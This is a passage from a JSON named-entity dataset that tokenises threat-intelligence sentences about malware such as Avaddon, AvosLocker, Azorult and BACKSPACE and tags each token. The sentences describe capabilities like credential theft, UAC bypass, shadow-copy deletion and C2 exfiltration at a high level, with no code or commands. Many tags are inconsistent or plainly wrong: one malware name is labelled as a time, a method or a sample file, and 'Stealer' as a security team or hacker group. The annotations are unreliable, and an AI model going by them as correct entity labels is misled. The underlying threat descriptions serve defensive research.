"with", - "a", - "public", - "RSA", - "key." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor", - "can", - "detect", - "whether", - "it", - "is", - "executed", - "in", - "some", - "virtualized", - "or", - "emulated", - "environment", - "by", - "searching", - "for", - "specific", - "artifacts,", - "such", - "as", - "communication", - "with", - "I/O", - "ports", - "and", - "using", - "VM-specific", - "instructions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Attor", - "monitors", - "the", - "free", - "disk", - "space", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor", - "has", - "manipulated", - "the", - "time", - "of", - "last", - "access", - "to", - "files", - "and", - "registry", - "keys", - "after", - "they", - "have", - "been", - "created", - "or", - "modified." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor's", - "dispatcher", - "can", - "establish", - "persistence", - "by", - "registering", - "a", - "new", - "service." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AuTo", - "Stealer", - "can", - "collect", - "data", - "such", - "as", - "PowerPoint", - "files,", - "Word", - "documents,", - "Excel", - "files,", - "PDF", - "files,", - "text", - "files,", - "database", - "files,", - "and", - "image", - "files", - "from", - "an", - "infected", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "O", - "O", - "B-Way", - "B-Tool", - "I-Tool", - "O", - "B-Way", - "B-Tool", - "I-Tool", - "O", - "I-Tool", - "O", - "I-Features", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AuTo", - "Stealer", - "can", - "exfiltrate", - "data", - "over", - "actor-controlled", - "C2", - "servers", - "via", - "HTTP", - "or", - "TCP." - ], - "ner_tags": [ - "B-Way", - "B-HackOrg", - "O", - "B-SamFile", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "AuTo", - "Stealer", - "can", - "store", - "collected", - "data", - "from", - "an", - "infected", - "host", - "to", - "a", - "file", - "named", - "`Hostname_UserName.txt`", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AuTo", - "Stealer", - "can", - "use", - "TCP", - "to", - "communicate", - "with", - "command", - "and", - "control", - "servers." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AuTo", - "Stealer", - "can", - "place", - "malicious", - "executables", - "in", - "a", - "victim's", - "AutoRun", - "registry", - "key", - "or", - "StartUp", - "directory,", - "depending", - "on", - "the", - "AV", - "product", - "installed,", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "B-Features", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AuTo", - "Stealer", - "has", - "the", - "ability", - "to", - "collect", - "information", - "about", - "installed", - "AV", - "products", - "from", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AuTo", - "Stealer", - "has", - "the", - "ability", - "to", - "collect", - "the", - "hostname", - "and", - "OS", - "information", - "from", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AuTo", - "Stealer", - "has", - "the", - "ability", - "to", - "collect", - "the", - "username", - "from", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AuTo", - "Stealer", - "can", - "use", - "HTTP", - "to", - "communicate", - "with", - "its", - "C2", - "servers." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AuTo", - "Stealer", - "can", - "use", - "`cmd.exe`", - "to", - "execute", - "a", - "created", - "batch", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AuditCred", - "uses", - "XOR", - "and", - "RC4", - "to", - "perform", - "decryption", - "on", - "the", - "code", - "functions." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AuditCred", - "encrypts", - "the", - "configuration." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AuditCred", - "can", - "delete", - "files", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AuditCred", - "can", - "search", - "through", - "folders", - "and", - "files", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AuditCred", - "can", - "download", - "files", - "and", - "additional", - "malware." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "AuditCred", - "can", - "inject", - "code", - "from", - "files", - "to", - "other", - "running", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AuditCred", - "can", - "utilize", - "proxy", - "for", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "AuditCred", - "can", - "open", - "a", - "reverse", - "shell", - "on", - "the", - "system", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AuditCred", - "is", - "installed", - "as", - "a", - "new", - "service", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AutoIt", - "backdoor", - "attempts", - "to", - "escalate", - "privileges", - "by", - "bypassing", - "User", - "Access", - "Control." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AutoIt", - "backdoor", - "is", - "capable", - "of", - "identifying", - "documents", - "on", - "the", - "victim", - "with", - "the", - "following", - "extensions:", - ".doc;", - ".pdf,", - ".csv,", - ".ppt,", - ".docx,", - ".pst,", - ".xls,", - ".xlsx,", - ".pptx,", - "and", - ".jpeg." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "AutoIt", - "backdoor", - "downloads", - "a", - "PowerShell", - "script", - "that", - "decodes", - "to", - "a", - "typical", - "shellcode", - "loader." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AutoIt", - "backdoor", - "has", - "sent", - "a", - "C2", - "response", - "that", - "was", - "base64-encoded." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Avaddon", - "bypasses", - "UAC", - "using", - "the", - "CMSTPLUA", - "COM", - "interface." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Avaddon", - "encrypts", - "the", - "victim", - "system", - "using", - "a", - "combination", - "of", - "AES256", - "and", - "RSA", - "encryption", - "schemes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Avaddon", - "has", - "decrypted", - "encrypted", - "strings." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Avaddon", - "looks", - "for", - "and", - "attempts", - "to", - "stop", - "anti-malware", - "solutions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Avaddon", - "has", - "searched", - "for", - "specific", - "files", - "prior", - "to", - "encryption." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Avaddon", - "deletes", - "backups", - "and", - "shadow", - "copies", - "using", - "native", - "system", - "tools." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Avaddon", - "has", - "been", - "executed", - "through", - "a", - "malicious", - "JScript", - "downloader." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Avaddon", - "modifies", - "several", - "registry", - "keys", - "for", - "persistence", - "and", - "UAC", - "bypass." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Avaddon", - "has", - "used", - "the", - "Windows", - "Crypto", - "API", - "to", - "generate", - "an", - "AES", - "key." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Avaddon", - "has", - "enumerated", - "shared", - "folders", - "and", - "mapped", - "volumes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Avaddon", - "has", - "used", - "encrypted", - "strings." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Avaddon", - "has", - "collected", - "information", - "about", - "running", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Avaddon", - "uses", - "registry", - "run", - "keys", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Avaddon", - "looks", - "for", - "and", - "attempts", - "to", - "stop", - "database", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Avaddon", - "checks", - "for", - "specific", - "keyboard", - "layouts", - "and", - "OS", - "languages", - "to", - "avoid", - "targeting", - "Commonwealth", - "of", - "Independent", - "States", - "(CIS)", - "entities." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Avaddon", - "can", - "collect", - "the", - "external", - "IP", - "address", - "of", - "the", - "victim." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Avaddon", - "uses", - "wmic.exe", - "to", - "delete", - "shadow", - "copies." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Avenger", - "has", - "the", - "ability", - "to", - "decrypt", - "files", - "downloaded", - "from", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Avenger", - "has", - "the", - "ability", - "to", - "XOR", - "encrypt", - "files", - "to", - "be", - "sent", - "to", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Avenger", - "has", - "the", - "ability", - "to", - "browse", - "files", - "in", - "directories", - "such", - "as", - "Program", - "Files", - "and", - "the", - "Desktop." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Avenger", - "has", - "the", - "ability", - "to", - "download", - "files", - "from", - "C2", - "to", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Avenger", - "has", - "the", - "ability", - "to", - "use", - "Tasklist", - "to", - "identify", - "running", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Avenger", - "has", - "the", - "ability", - "to", - "inject", - "shellcode", - "into", - "svchost.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Avenger", - "has", - "the", - "ability", - "to", - "identify", - "installed", - "anti-virus", - "products", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Avenger", - "can", - "extract", - "backdoor", - "malware", - "from", - "downloaded", - "images." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Avenger", - "has", - "the", - "ability", - "to", - "identify", - "the", - "host", - "volume", - "ID", - "and", - "the", - "OS", - "architecture", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Avenger", - "can", - "identify", - "the", - "domain", - "of", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Avenger", - "has", - "the", - "ability", - "to", - "use", - "HTTP", - "in", - "communication", - "with", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AvosLocker", - "has", - "encrypted", - "files", - "and", - "network", - "resources", - "using", - "AES-256", - "and", - "added", - "an", - "`.avos`,", - "`.avos2`,", - "or", - "`.AvosLinux`", - "extension", - "to", - "filenames." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AvosLocker", - "has", - "deobfuscated", - "XOR-encoded", - "strings." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AvosLocker", - "has", - "used", - "obfuscated", - "API", - "calls", - "that", - "are", - "retrieved", - "by", - "their", - "checksums." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AvosLocker", - "has", - "searched", - "for", - "files", - "and", - "directories", - "on", - "a", - "compromised", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AvosLocker", - "has", - "hidden", - "its", - "console", - "window", - "by", - "using", - "the", - "`ShowWindow`", - "API", - "function." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AvosLocker", - "has", - "been", - "disguised", - "as", - "a", - ".jpg", - "file." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "AvosLocker", - "has", - "used", - "a", - "variety", - "of", - "Windows", - "API", - "calls,", - "including", - "`NtCurrentPeb`", - "and", - "`GetLogicalDrives`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "AvosLocker", - "has", - "enumerated", - "shared", - "drives", - "on", - "a", - "compromised", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AvosLocker", - "has", - "used", - "XOR-encoded", - "strings." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AvosLocker", - "has", - "discovered", - "system", - "processes", - "by", - "calling", - "`RmGetList`." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "AvosLocker", - "has", - "been", - "executed", - "via", - "the", - "`RunOnce`", - "Registry", - "key", - "to", - "run", - "itself", - "on", - "safe", - "mode." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AvosLocker", - "can", - "restart", - "a", - "compromised", - "machine", - "in", - "safe", - "mode." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AvosLocker", - "has", - "terminated", - "specific", - "processes", - "before", - "encryption." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AvosLocker’s", - "Linux", - "variant", - "has", - "terminated", - "ESXi", - "virtual", - "machines." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AvosLocker", - "has", - "checked", - "the", - "system", - "time", - "before", - "and", - "after", - "encryption." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Azorult", - "can", - "call", - "WTSQueryUserToken", - "and", - "CreateProcessAsUser", - "to", - "start", - "a", - "new", - "process", - "with", - "local", - "system", - "privileges." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Azorult", - "can", - "steal", - "credentials", - "in", - "files", - "belonging", - "to", - "common", - "software", - "such", - "as", - "Skype,", - "Telegram,", - "and", - "Steam." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "Azorult", - "can", - "steal", - "credentials", - "from", - "the", - "victim's", - "browser." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Azorult", - "uses", - "an", - "XOR", - "key", - "to", - "decrypt", - "content", - "and", - "uses", - "Base64", - "to", - "decode", - "the", - "C2", - "address." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Azorult", - "can", - "delete", - "files", - "from", - "victim", - "machines." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Azorult", - "can", - "recursively", - "search", - "for", - "files", - "in", - "folders", - "and", - "collects", - "files", - "from", - "the", - "desktop", - "with", - "certain", - "extensions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Azorult", - "can", - "download", - "and", - "execute", - "additional", - "files.", - "Azorult", - "has", - "also", - "downloaded", - "a", - "ransomware", - "payload", - "called", - "Hermes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Azorult", - "can", - "collect", - "a", - "list", - "of", - "running", - "processes", - "by", - "calling", - "CreateToolhelp32Snapshot." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Azorult", - "can", - "decrypt", - "the", - "payload", - "into", - "memory,", - "create", - "a", - "new", - "suspended", - "process", - "of", - "itself,", - "then", - "inject", - "a", - "decrypted", - "payload", - "to", - "the", - "new", - "process", - "and", - "resume", - "new", - "process", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Azorult", - "can", - "check", - "for", - "installed", - "software", - "on", - "the", - "system", - "under", - "the", - "Registry", - "key", - "<code>Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Azorult", - "can", - "capture", - "screenshots", - "of", - "the", - "victim’s", - "machines." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Azorult", - "can", - "encrypt", - "C2", - "traffic", - "using", - "XOR." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "B-HackOrg", - "B-Features", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Azorult", - "can", - "collect", - "the", - "machine", - "information,", - "system", - "architecture,", - "the", - "OS", - "version,", - "computer", - "name,", - "Windows", - "product", - "name,", - "the", - "number", - "of", - "CPU", - "cores,", - "video", - "card", - "information,", - "and", - "the", - "system", - "language." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Azorult", - "can", - "collect", - "host", - "IP", - "information", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Azorult", - "can", - "collect", - "the", - "username", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Azorult", - "can", - "collect", - "the", - "time", - "zone", - "information", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "\"ZR\"", - "variant", - "of", - "BACKSPACE", - "will", - "check", - "to", - "see", - "if", - "known", - "host-based", - "firewalls", - "are", - "installed", - "on", - "the", - "infected", - "systems.", - "BACKSPACE", - "will", - "attempt", - "to", - "establish", - "a", - "C2", - "channel,", - "then", - "will", - "examine", - "open", - "windows", - "to", - "identify", - "a", - "pop-up", - "from", - "the", - "firewall", - "software", - "and", - "will", - "simulate", - "a", - "mouse-click", - "to", - "allow", - "the", - "connection", - "to", - "proceed." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Adversaries", - "can", - "direct", - "BACKSPACE", - "to", - "upload", - "files", - "to", - "the", - "C2", - "Server." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BACKSPACE", - "allows", - "adversaries", - "to", - "search", - "for", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "The", - "\"ZJ\"", - "variant", - "of", - "BACKSPACE", - "allows", - "\"ZJ", - "link\"", - "infections", - "with", - "Internet", - "access", - "to", - "relay", - "traffic", - "from", - "\"ZJ", - "listen\"", - "to", - "a", - "command", - "server." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BACKSPACE", - "is", - "capable", - "of", - "deleting", - "Registry", - "keys,", - "sub-keys,", - "and", - "values", - "on", - "a", - "victim", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "B-Features", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BACKSPACE", - "attempts", - "to", - "avoid", - "detection", - "by", - "checking", - "a", - "first", - "stage", - "command", - "and", - "control", - "server", - "to", - "determine", - "if", - "it", - "should", - "connect", - "to", - "the", - "second", - "stage", - "server,", - "which", - "performs", - "\"louder\"", - "interactions", - "with", - "the", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Newer", - "variants", - "of", - "BACKSPACE", - "will", - "encode", - "C2", - "communications", - "with", - "a", - "custom", - "system." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BACKSPACE", - "may", - "collect", - "information", - "about", - "running", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BACKSPACE", - "is", - "capable", - "of", - "enumerating", - "and", - "making", - "modifications", - "to", - "an", - "infected", - "system's", - "Registry." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BACKSPACE", - "achieves", - "persistence", - "by", - "creating", - "a", - "shortcut", - "to", - "itself", - "in", - "the", - "CSIDL_STARTUP", - "directory." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - 